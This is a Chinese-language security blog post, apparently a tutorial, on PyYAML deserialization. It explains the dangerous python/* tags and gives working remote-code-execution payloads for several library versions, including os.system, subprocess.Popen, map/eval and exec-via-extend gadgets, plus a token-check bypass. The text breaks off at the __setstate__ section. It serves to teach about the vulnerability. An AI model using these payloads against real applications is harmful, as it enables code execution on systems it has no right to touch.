

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="springtime">
  <meta name="keywords" content="">
  
    <meta name="description" content="YAML基础基础语法见附录，借用一个简单的例子快速入门： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172import yamlyaml.load(&amp;#x27;&amp;#x27;&amp;#x">
<meta property="og:type" content="article">
<meta property="og:title" content="PyYaml反序列化">
<meta property="og:url" content="http://example.com/2023/05/17/PyYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="spring&#39;s blog">
<meta property="og:description" content="YAML基础基础语法见附录，借用一个简单的例子快速入门： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172import yamlyaml.load(&amp;#x27;&amp;#x27;&amp;#x">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rzx1szyykpugqc-1252075454.piccd.myqcloud.com/SecMap-unserialize-pyyaml/8d42331c-e3bd-4620-af91-f6c797f8117e.png!blog">
<meta property="og:image" content="http://example.com/2023/05/17/PyYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20230519193611913.png">
<meta property="article:published_time" content="2023-05-17T02:35:55.000Z">
<meta property="article:modified_time" content="2023-05-23T02:31:22.000Z">
<meta property="article:author" content="springtime">
<meta property="article:tag" content="PyYaml">
<meta property="article:tag" content="python安全">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://rzx1szyykpugqc-1252075454.piccd.myqcloud.com/SecMap-unserialize-pyyaml/8d42331c-e3bd-4620-af91-f6c797f8117e.png!blog">
  
  
  
  <title>PyYaml反序列化 - spring&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>springtime</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PyYaml反序列化"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-05-17 10:35" pubdate>
          Wednesday, May 17th 2023, 10:35 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">PyYaml反序列化</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="YAML基础"><a href="#YAML基础" class="headerlink" title="YAML基础"></a>YAML基础</h1><p>基础语法见附录，借用一个简单的例子快速入门：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> yaml<br><br>yaml.load(<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string"></span><br><span class="hljs-string">string_0:</span><br><span class="hljs-string">    - macr0phag3</span><br><span class="hljs-string">    - &quot;I&#x27;m Tr0y&quot;  # 可以使用双引号或者单引号包裹特殊字符</span><br><span class="hljs-string">    - &quot;I am fine. \u263A&quot; # 使用双引号包裹时支持 Unicode 编码</span><br><span class="hljs-string">    - &quot;\\x0d\\x0a is \\r\\n&quot; # 使用双引号包裹时还支持 Hex 编码</span><br><span class="hljs-string">    - newline</span><br><span class="hljs-string">      newline2  # 字符串可以拆成多行，每行之间用空格隔开</span><br><span class="hljs-string"></span><br><span class="hljs-string"># &gt; 可以在字符串中折叠换行</span><br><span class="hljs-string">string_1: &gt;</span><br><span class="hljs-string">    newline</span><br><span class="hljs-string">    newline2</span><br><span class="hljs-string"></span><br><span class="hljs-string"># &#124; 保留换行符</span><br><span class="hljs-string">string_2: &#124;</span><br><span class="hljs-string">    newline</span><br><span class="hljs-string">    newline2</span><br><span class="hljs-string"></span><br><span class="hljs-string"># &#124; 保留换行符，且去掉最后一个换行符</span><br><span class="hljs-string">string_3: &#124;-</span><br><span class="hljs-string">    newline</span><br><span class="hljs-string">    newline2</span><br><span class="hljs-string"></span><br><span class="hljs-string">list: &amp;id_1</span><br><span class="hljs-string">- 18  # 定义锚点</span><br><span class="hljs-string">- cm</span><br><span class="hljs-string"></span><br><span class="hljs-string">two_dimensional_list:</span><br><span class="hljs-string">-</span><br><span class="hljs-string">    - Macr0phag3</span><br><span class="hljs-string">    - Tr0y</span><br><span class="hljs-string"></span><br><span class="hljs-string">boolean: </span><br><span class="hljs-string">    - TRUE  # true、True、Yes、YES、yes、ON、on、On 都可以</span><br><span class="hljs-string">    - FALSE  # false、False、NO、no、No、off、OFF、Off 都可以</span><br><span class="hljs-string"></span><br><span class="hljs-string">float:</span><br><span class="hljs-string">    - 3.14</span><br><span class="hljs-string">    - 6.8523015e+5  # 可以使用科学计数法</span><br><span class="hljs-string"></span><br><span class="hljs-string">int:</span><br><span class="hljs-string">    - 123</span><br><span class="hljs-string">    - 0b10100111010010101110  # 支持二进制表示</span><br><span class="hljs-string">    - 0x0a  # 支持十六进制表示</span><br><span class="hljs-string"></span><br><span class="hljs-string">nulls:</span><br><span class="hljs-string">  - null  # NULL 也 ok</span><br><span class="hljs-string">  - Null</span><br><span class="hljs-string">  - ~</span><br><span class="hljs-string">  -</span><br><span class="hljs-string"></span><br><span class="hljs-string">date:</span><br><span class="hljs-string">    - 2018-02-17  # 日期必须使用 ISO 8601 格式，即 yyyy-MM-dd</span><br><span class="hljs-string"></span><br><span class="hljs-string">datetime: </span><br><span class="hljs-string">    -  2018-02-17T15:02:31+08:00  # 时间使用 ISO 8601 格式，时间和日期之间使用 T 连接，最后使用 + 代表时区</span><br><span class="hljs-string"></span><br><span class="hljs-string"># &gt; 可以在字符串中折叠换行</span><br><span class="hljs-string">object: &amp;id_2</span><br><span class="hljs-string">    name: Tr0y</span><br><span class="hljs-string">    money: 0</span><br><span class="hljs-string"></span><br><span class="hljs-string">json: [&#123;1: Macr0phag3, 2: Tr0y&#125;, &quot;???&quot;]  # 值支持 json</span><br><span class="hljs-string"></span><br><span class="hljs-string">reference: </span><br><span class="hljs-string">    size: *id_1</span><br><span class="hljs-string">    &lt;&lt;: *id_2</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p><img src="https://rzx1szyykpugqc-1252075454.piccd.myqcloud.com/SecMap-unserialize-pyyaml/8d42331c-e3bd-4620-af91-f6c797f8117e.png!blog" srcset="/img/loading.gif" lazyload alt="img"></p>
<h1 id="类型转换"><a href="#类型转换" class="headerlink" title="类型转换"></a>类型转换</h1><p>所谓类型转换，就是使用符号<code>!!</code>+<code>tag</code>实现数据类型的强制转换，比如<strong>将数字强制转换成字符串</strong>：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-attr">a:</span> <span class="hljs-type">!!str</span> <span class="hljs-number">123</span><br><span class="hljs-comment">#等价于</span><br><span class="hljs-attr">a:</span> <span class="hljs-string">&quot;123&quot;</span><br></code></pre></td></tr></table></figure>

<p>基于这种特性，PyYAML可以实现<strong>拓展解析</strong>的能力，选择合适的解析器对数据进行解析处理，可以是简单的数据类型，也可以是<strong>模块、实例</strong>。doc中列举除了一些基础tag和特殊tag:</p>
<img src="/2023/05/17/PyYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20230519193611913.png" srcset="/img/loading.gif" lazyload class="" title="image-20230519193611913">

<ul>
<li><strong>基础类型转换</strong></li>
</ul>
<p><code>site-packages/yaml/constructor.py</code>中有24处调用<code>add_constructor()</code>的地方，也就是说PyYAML中支持24中基础的类型转换，也就是上图中的<code>Standard YAML tag</code>与<code>Python-specific tags</code>部分，对于基础的类型转换可以简单抽象成以下过程：</p>
<blockquote>
<p>!!module_name args   &lt;&#x3D;&gt;  find_function(“module_name”)(args)</p>
</blockquote>
<ul>
<li><strong>高级类型转换</strong></li>
</ul>
<p>除了<code>add_constructor()</code>之外，还有<code>add_multi_constructor()</code>的调用，也就是对应上图中的<code>Complex Python tags</code>：</p>
<table>
<thead>
<tr>
<th align="center">tag</th>
<th align="center">expression</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>!!python/name:module.name</code></td>
<td align="center"><code>module.name</code></td>
</tr>
<tr>
<td align="center"><code>!!python/module:package.module</code></td>
<td align="center"><code>package.module</code></td>
</tr>
<tr>
<td align="center"><code>!!python/object:module.cls</code></td>
<td align="center"><code>module.cls</code> instance</td>
</tr>
<tr>
<td align="center"><code>!!python/object/new:module.cls</code></td>
<td align="center"><code>module.cls</code> instance</td>
</tr>
<tr>
<td align="center"><code>!!python/object/apply:module.f</code></td>
<td align="center">value of <code>f(...)</code></td>
</tr>
</tbody></table>
<p>很明显这五种tag都可以引入新的模块，导致PyYAML存在被反序列化攻击的可能。</p>
<p>下面逐一介绍高级类型转换中的五个标签。</p>
<h2 id="危险标签"><a href="#危险标签" class="headerlink" title="危险标签"></a>危险标签</h2><h3 id="python-x2F-object-x2F-apply"><a href="#python-x2F-object-x2F-apply" class="headerlink" title="python&#x2F;object&#x2F;apply"></a>python&#x2F;object&#x2F;apply</h3><p>对应<code>construct_python_object_apply</code>，它可以引入模块中的方法并执行，可以传入参数并且以列表的方式提供：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#以下几种写法等价</span><br>yaml.load(<span class="hljs-string">&#x27;exp: !!python/object/apply:os.system [&quot;whoami&quot;]&#x27;</span>)<br>yaml.load(<span class="hljs-string">&quot;exp: !!python/object/apply:os.system [whoami]&quot;</span>) <span class="hljs-comment">#引号可省略</span><br>yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">exp: !!python/object/apply:os.system</span><br><span class="hljs-string">- whoami</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br>yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">exp: !!python/object/apply:os.system</span><br><span class="hljs-string">  args: [&quot;whoami&quot;]</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br>yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">exp: !!python/object/apply:os.system</span><br><span class="hljs-string">  kwds: &#123;&quot;command&quot;: &quot;whoami&quot;&#125;</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br>yaml.load(<span class="hljs-string">&quot;!!python/object/apply:os.system [whoami]: exp&quot;</span>)<br>yaml.load(<span class="hljs-string">&quot;!!python/object/apply:os.system [whoami]&quot;</span>)<br>yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/apply:os.system</span><br><span class="hljs-string">- whoami</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<h3 id="python-x2F-object-x2F-new"><a href="#python-x2F-object-x2F-new" class="headerlink" title="python&#x2F;object&#x2F;new"></a>python&#x2F;object&#x2F;new</h3><p>与<code>python/object/apply</code><strong>基本等价</strong>，对应函数<code>construct_python_object_new</code>，payload也相同。</p>
<h3 id="python-x2F-object"><a href="#python-x2F-object" class="headerlink" title="python&#x2F;object"></a>python&#x2F;object</h3><p>对应函数<code>construct_python_object</code>，可以调用构造函数但无法传参。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.load(<span class="hljs-string">&quot;!!python/object:builtins.copyright&quot;</span>)<br></code></pre></td></tr></table></figure>

<h3 id="python-x2F-module"><a href="#python-x2F-module" class="headerlink" title="python&#x2F;module"></a>python&#x2F;module</h3><p>对应函数<code>construct_python_module</code>，后续调用<code>find_python_module</code>，也就是<code>import</code>，一般情况下<code>import</code>导入模块不会执行py文件里的代码，除了命名空间<code>__name__ == &quot;__main__&quot;</code>的代码部分。这时候想要利用这个标签RCE，自然会联想到结合任意文件上传，那么这就有点类似于php的文件包含了，不过后缀必须是py。举个例子存在如下flask项目：</p>
<blockquote>
<p>├── app.py<br>├── static<br>├── templates<br>│   └── index.html<br>└── uploads<br>   ├── exp.py<br>   └── info.py</p>
</blockquote>
<p>app.py中包含如下利用代码：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.load(<span class="hljs-string">&quot;!!python/module:uploads.exp&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>exp.py为恶意模块</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> os<br>os.system(<span class="hljs-string">&quot;id&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>然后执行app.py就可以实现rce。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">python3 app.py<br><span class="hljs-comment">#uid=1000(spring) gid=0(root) groups=0(root)</span><br></code></pre></td></tr></table></figure>

<p>或者可以上传<code>__init__.py</code>至uploads文件夹，不需要指定包名就可以直接触发：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.load(<span class="hljs-string">&quot;!!python/module:uploads&quot;</span>)<br></code></pre></td></tr></table></figure>

<h3 id="python-x2F-name"><a href="#python-x2F-name" class="headerlink" title="python&#x2F;name"></a>python&#x2F;name</h3><p>对应函数是<code>construct_python_name</code>，后续调用<code>find_python_name</code>，他返回模块下面的属性或方法。它可以用于以下特殊场景：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> yaml<br><br>TOKEN = <span class="hljs-string">&quot;Y0u_Nev3r_kn0w.&quot;</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check</span>(<span class="hljs-params">config</span>):<br>    <span class="hljs-keyword">try</span>:<br>        token = yaml.load(config).get(<span class="hljs-string">&quot;token&quot;</span>, <span class="hljs-literal">None</span>)<br>    <span class="hljs-keyword">except</span> Exception:<br>        token = <span class="hljs-literal">None</span><br><br>    <span class="hljs-keyword">if</span> token == TOKEN:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;yes, master.&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;fuck off!&quot;</span>)<br><br>config = <span class="hljs-string">&#x27;&#x27;</span>  <span class="hljs-comment"># 可控输入点</span><br>check(config)<br></code></pre></td></tr></table></figure>

<p>这时将payload设置为<code>token=!!python/name:__main__.TOKEN</code>，就可以绕过对于token的check，前提是<strong>需要知道变量名</strong>是<code>token</code>，当然这种情况下直接RCE也是可以的。</p>
<h1 id="攻击思路"><a href="#攻击思路" class="headerlink" title="攻击思路"></a>攻击思路</h1><h2 id="PyYAML-lt-5-1"><a href="#PyYAML-lt-5-1" class="headerlink" title="PyYAML &lt; 5.1"></a>PyYAML &lt; 5.1</h2><blockquote>
<p>默认构造器：Constructor</p>
<p>不支持标签：无，全部支持。</p>
</blockquote>
<p>版本小于5.1提供两个方法解析YAML：</p>
<ul>
<li><code>yaml.load</code>：加载单个YAML文件</li>
<li><code>yaml.load_all</code>：加载多个YAML文件</li>
</ul>
<p>两者都可以指定构造器<code>Loader</code>，此版本下构造器有三种：</p>
<ul>
<li><code>BaseConstructor</code>：基础构造器，不支持类型转换。</li>
<li><code>SafeConstructor</code>：集成BaseConstructor，同时类型转换和YAML规范一致，不支持<code>complex python tags</code>。</li>
<li><code>Constructor</code>：在YAML规范基础上新增<code>complex python tags</code>。</li>
</ul>
<p>支持complex python tags的Constructor构造器是最危险的构造器，同时<strong>它也是在此版本下默认使用的</strong>。</p>
<p>此版本下五种标签看情况选择即可。</p>
<h2 id="PyYAML-x3D-5-1"><a href="#PyYAML-x3D-5-1" class="headerlink" title="PyYAML &#x3D; 5.1"></a>PyYAML &#x3D; 5.1</h2><blockquote>
<p>默认构造器：FullConstructor</p>
<p>不支持标签：无，全部支持。</p>
</blockquote>
<p>此版本下的构造器有：</p>
<ul>
<li><code>BaseConstructor</code>：没有任何强制类型转换</li>
<li><code>SafeConstructor</code>：只有基础类型的强制类型转换</li>
<li><code>FullConstructor</code>：除了 <code>python/object/apply</code> 之外都支持，但是加载的模块必须位于 <code>sys.modules</code> 中（说明已经主动 import 过了才让加载）。这个是默认的构造器。</li>
<li><code>UnsafeConstructor</code>：支持全部的强制类型转换</li>
<li><code>Constructor</code>：等同于 <code>UnsafeConstructor</code></li>
</ul>
<p>同时，新增了几个加载方法：</p>
<ul>
<li><code>yaml.full_load</code></li>
<li><code>yaml.full_load_all</code></li>
<li><code>yaml.unsafe_load</code></li>
<li><code>yaml.unsafe_load_all</code></li>
</ul>
<h3 id="不使用FullConstructor"><a href="#不使用FullConstructor" class="headerlink" title="不使用FullConstructor"></a>不使用FullConstructor</h3><p>这种情况下和版本小于5.1的利用方式相同，但构造器必须是<code>UnsafeConstructor</code>、<code>Constructor</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">yaml.unsafe_load(exp)<br>yaml.load(exp, Loader=UnsafeLoader)<br></code></pre></td></tr></table></figure>



<h3 id="突破FullConstructor"><a href="#突破FullConstructor" class="headerlink" title="突破FullConstructor"></a>突破FullConstructor</h3><p><strong>goal：</strong>触发带参数调用+引入函数</p>
<p>FullConstructor只允许加载<code>sys.modules</code>中的模块，也就是import过的，总结来说利用过程中需要解决如下限制：</p>
<ol>
<li>只引用，不执行的限制：<ul>
<li>加载进来的 <code>module</code> 必须是位于 <code>sys.modules</code> 中</li>
</ul>
</li>
<li>引用并执行：<ul>
<li>加载进来的 <code>module</code> 必须是位于 <code>sys.modules</code> 中</li>
<li>FullConstructor 下，<code>unsafe = False</code>，加载进来的 <code>module.name</code> 必须是一个类</li>
</ul>
</li>
</ol>
<p>两个不行的例子：</p>
<ol>
<li><code>!!python/name:pickle.loads</code>：<code>pickle</code> 不在 <code>sys.modules</code> 中</li>
<li><code>!!python/object/new:builtins.eval [&quot;print(1)&quot;]</code>：<code>eval</code> 虽然在 <code>sys.modules</code> 中，但是 <code>type(builtins.eval)</code> 是 <code>builtin_function_or_method</code> 而不是一个类。</li>
</ol>
<h4 id="subprocess-Popen"><a href="#subprocess-Popen" class="headerlink" title="subprocess.Popen()"></a>subprocess.Popen()</h4><p>满足位于<code>sys.modules</code>，同时可以执行命令的类就是<code>subprocess.Popen</code>，因此使用apply标签的payload就是：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/apply:subprocess.Popen</span><br><span class="hljs-string">  - whoami</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<h4 id="map"><a href="#map" class="headerlink" title="map()"></a>map()</h4><p>不使用apply标签，在builtins内置模块中还有<code>map</code>、<code>filter</code>等可以触发函数执行。类可以通过<code>python/object/new</code>引入，而函数可以通过<code>python/name</code>引入，最后的payload就是：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/new:tuple</span><br><span class="hljs-string">- !!python/object/new:map</span><br><span class="hljs-string">  - !!python/name:eval</span><br><span class="hljs-string">  - [&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;]</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<h4 id="listitems-extend"><a href="#listitems-extend" class="headerlink" title="listitems.extend()"></a>listitems.extend()</h4><p>使用<code>FullConstructor</code>加载YAML的同时，会调用<code>construct_python_object_apply</code>，而它不仅进行了实例化，如果有<code>listitems</code>还会调用实例中的<code>extend</code>属性指定的方法，比如：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs py">exp = <span class="hljs-built_in">type</span>(<span class="hljs-string">&quot;exp&quot;</span>, (), &#123;<span class="hljs-string">&quot;extend&quot;</span>: <span class="hljs-built_in">eval</span>&#125;)<br>exp.extend(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>因此转换成YAML就是：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.full_load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/new:type</span><br><span class="hljs-string">args:</span><br><span class="hljs-string">  - exp</span><br><span class="hljs-string">  - !!python/tuple []</span><br><span class="hljs-string">  - &#123;&quot;extend&quot;: !!python/name:exec &#125;</span><br><span class="hljs-string">listitems: &quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<h4 id="setstate-state"><a href="#setstate-state" class="headerlink" title="__setstate__(state)"></a>__setstate__(state)</h4><p>除了<code>extend</code>，<code>construct_python_object_apply</code>还会调用<code>setstate</code>，对于这个利用方式picke反序列化中已经提到：</p>
